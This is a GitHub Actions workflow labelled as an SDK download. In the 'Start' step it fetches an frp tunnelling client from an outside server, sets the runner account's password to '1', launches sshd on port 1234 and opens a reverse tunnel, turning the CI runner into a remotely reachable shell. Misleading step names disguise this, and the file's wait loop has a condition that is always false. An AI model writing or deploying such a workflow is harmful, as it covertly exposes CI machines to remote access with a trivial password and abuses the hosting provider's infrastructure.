name: GetSDK
on: 
  workflow_dispatch:
defaults:
  run:
    shell: bash

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Get SDK Code
      uses: curoky/cleanup-disk-action@v2.0

    - name: Start
      run: |
         echo "Cleaning Up"
         sudo docker rmi $(docker images -q)
         echo "Creating FileShare Partition"
         sudo mkdir /file/
         echo "Downing CoreTools"
         sudo curl https://nyat-static.globalslb.net/natfrp/client/0.39.1-sakura-1.1/frpc_linux_amd64 >$HOME/frpc
         sudo apt install openssh -y
         sudo chmod a+x $HOME/frpc
         sudo echo "runner:1"|chpasswd
         echo "Starting Core Daemon"
         sudo $HOME/frpc -f 47380d154cf02411:2918234 &
         sudo sshd -p 1234 &
         echo "end of life"

    - name: Start
      run: |
         checklo(){
          if [ ! -n "/file/ok" ]; then
            echo "Continuing..."
            sleep 300
            checklo
          else
            echo "Exiting"
            sleep 10
          fi
          }
          checklo

    - name: Store file partition
      uses: actions/upload-artifact@v1
      with:
        name: SDKpkg
        path: /file/
